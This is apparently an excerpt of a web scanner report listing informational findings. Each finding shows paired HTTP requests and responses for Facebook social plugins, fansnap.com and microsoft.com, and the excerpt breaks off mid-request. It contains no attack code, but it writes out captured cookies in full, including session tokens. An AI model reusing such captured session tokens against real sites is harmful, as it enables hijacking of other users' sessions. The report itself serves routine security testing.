...[SNIP]...

Request 2

GET /plugins/activity.php?site=www.boston.com&width=311&height=300&header=false&colorscheme=light&font&border_color=white&ref=homepage HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.169.27
X-Cnection: close
Date: Tue, 19 Jul 2011 20:43:30 GMT
Content-Length: 8701

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="HHMW";</scri
...[SNIP]...
<div id="u821069_1" class="fbConnectWidgetTopmost" style="height:298px; width:309px; border-color:white;"><div style="overflow: hidden;height:275px; "><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u821070_3"><input value="Sign Up" type="submit" id="u821070_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u821069_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u821069_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" width="32" height="32" /></div></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a><div class="UIImageBlock_Content UIImageBlock_ICON_Content"><div class="fss fwn fcg"><span><a class="uiLinkSubtle" target="_blank" href="http://developers.facebook.com/plugins/?footer=3">Facebo
...[SNIP]...

18.10. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.25
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:22 GMT
Content-Length: 6328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...
<div id="connect_widget_4e259396c4bc26e08962968" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 640 others like this.</span><span class="connect_widget_not_connected_text">640 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=bing.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.bing.com%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see
...[SNIP]...

Request 2

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.190.52
X-Cnection: close
Date: Tue, 19 Jul 2011 14:24:36 GMT
Content-Length: 6257

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...
<div id="connect_widget_4e2593a4c51cd6e34902522" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 641 others like this.</span><span class="connect_widget_not_connected_text">641 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_
...[SNIP]...

18.11. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/News.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.255.43
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:43 GMT
Content-Length: 10298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...
<input name="partner_id" value="fastteks.com" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_1" value="http://www.fastteks.com/TechSolutions/News.aspx" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u142366_2"><input value="Sign Up" type="submit" id="u142366_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u142366_1&quot;).login();"><b>log in</b></a> to see what your friends like.</div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/fastteksRI" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/277119_115365331864877_4380483_q.jpg" alt="Fast-teks TechSolutions" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/fastteksRI" target="_blank"><span class="name">Fast-teks TechSolutions</span></a></div><div><div id="connect_widget_4e25aadfa18bb0124286845" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="
...[SNIP]...

Request 2

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.230.40
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:58 GMT
Content-Length: 10143

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u143853_2"><input value="Sign Up" type="submit" id="u143853_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u143853_1&quot;).login();"><b>log in</b></a> to see what your friends like.</div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/fastteksRI" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/277119_115365331864877_4380483_q.jpg" alt="Fast-teks TechSolutions" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/fastteksRI" target="_blank"><span class="name">Fast-teks TechSolutions</span></a></div><div><div id="connect_widget_4e25aaee82a134218849257" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&
...[SNIP]...

18.12. http://www.fansnap.com/developers  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fansnap.com
Path:   /developers

Request 1

GET /developers HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fansnap.com/about
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgL58u68GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--5b44033c581130d6faa8811aaffe669fa3974944; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:44:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 14
ETag: "bfa7ab1f3b81c2b865b63d6a30d3b74a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgE5q87AGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--d9a3777cedf14b19a925974c0f762f2ddc6ee6dd; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12059
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<p id='app-signature'>
Last Updated: 2011-07-19 11:44:15 -0700 | REL-fansnap-1.20.2-r31787 | pgsdevelop-v0-c00000
</p>
</div>


</div>
</div>

<div id='locationModal'>
<form action='#' id='changeLocationForm'>
<label>
Zip Code:
</label>
<input id="zipcode" name="zipcode" type="text" />
<input id="saveLocation" name="commit" type="submit" value="Change" />
<div id='cancelLocation'></div>
</form>
</div>

<div class='sp1'></div>
<div class='clear'></div>
<script type="text/javascript">
//<![CDATA[
var fsi__ = { ch: 'fs', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: 526671144, usr: {id: null, e: null}, st: ''};
//]]>
</script>
<script src="http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>

<script type='text/javascript'>
//<![CDATA[
fsTop.assetHost = 'http://cdn-%d.fansnap.com/REL-fansnap-1.20.2-r31787';
fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787';
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
fsTop.channel = new Channel({"code":null,"id":1,"name":"fs"}, false, "fansnap.com");
//]]>
</script>

<div class='fansnaptron' id='fbAuthModal'>
<iframe frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fbAuthModalClose'>
<a class='fbAuthClose'>
Close
</a>
</div>
</div>


<div class='survey-confirm' id='fsAuthModal'>
<iframe frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fsAuthModalClose'>
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
</div>
</div>


<script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
<script type='text/javascript'>
//<![CDATA[
_uacct = "UA-4075898-1";
_udn = "fansnap.com";
urchinTracker();
//]]>
</script>


<div id='fb-root'></div>

<script type='text/javascript'>
//<![CDATA[
FBPackage.Authentication.init({domQu
...[SNIP]...

Request 2

GET /developers HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ver=1; vid=1342567440282625; tvid=1342567440282625; _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgL58u68GOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--5b44033c581130d6faa8811aaffe669fa3974944; POOLID=B; __utma=19633071.1263508421.1311101027.1311101027.1311101027.1; __utmb=19633071; __utmc=19633071; __utmz=19633071.1311101027.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; lvd=1311101038

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:44:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 15
ETag: "5d18a8757744aca69695186d2ce46e37"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DToPc2Vzc2lvbl9pZCIlMjZjYjcyMzdmODk2MWE0MWUxZjgwNjE1NjE4NWYyYjU6C3NyY19pZGkCAQE6B2xwSSIcaHR0cDovL3d3dy5mYW5zbmFwLmNvbS8GOgZFRjoIbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUALOhJsYXN0X2FjY2Vzc2VkSXU6CVRpbWUNctobgLduDrEGOgtvZmZzZXRp%2FpCdOg12aXNpdF9pZGkEKF1kHzoPdmlzaXRvcl9pZCIVMTM0MjU2NzQ0MDI4MjYyNToOc3R5bGVfaWRzSSIABjsIRg%3D%3D--e43a29e9228ec2eaf0e52ea22c48e405800c3007; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12015
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<p id='app-signature'>
Last Updated: 2011-07-19 11:44:16 -0700 | REL-fansnap-1.20.2-r31787 | pgsdevelop-v0-c00000
</p>
</div>


</div>
</div>

<div id='locationModal'>
<form action='#' id='changeLocationForm'>
<label>
Zip Code:
</label>
<input id="zipcode" name="zipcode" type="text" />
<input id="saveLocation" name="commit" type="submit" value="Change" />
<div id='cancelLocation'></div>
</form>
</div>

<div class='sp1'></div>
<div class='clear'></div>
<script type="text/javascript">
//<![CDATA[
var fsi__ = { ch: 'fs', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: 526671144, usr: {id: null, e: null}, st: ''};
//]]>
</script>
<script src="http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>

<script type='text/javascript'>
//<![CDATA[
fsTop.assetHost = 'http://cdn-%d.fansnap.com/REL-fansnap-1.20.2-r31787';
fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787';
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
fsTop.channel = new Channel({"code":null,"id":1,"name":"fs"}, false, "fansnap.com");
//]]>
</script>

<div class='fansnaptron' id='fbAuthModal'>
<iframe frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fbAuthModalClose'>
<a class='fbAuthClose'>
Close
</a>
</div>
</div>


<div class='survey-confirm' id='fsAuthModal'>
<iframe frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe>
<div class='fsAuthModalClose'>
<a class='fsAuthClose'>
<img alt="Cancel" src="http://cdn-2.fansnap.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" />
</a>
</div>
</div>


<script src='http://www.google-analytics.com/urchin.js' type='text/javascript'></script>
<script type='text/javascript'>
//<![CDATA[
_uacct = "UA-4075898-1";
_udn = "fansnap.com";
urchinTracker();
//]]>
</script>


<div id='fb-root'></div>

<script type='text/javascript'>
//<![CDATA[
FBPackage.Authentication.init({domQu
...[SNIP]...

18.13. http://www.microsoft.com/worldwide/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.microsoft.com
Path:   /worldwide/

Request 1

GET /worldwide/ HTTP/1.1
Host: www.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/worldwide
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
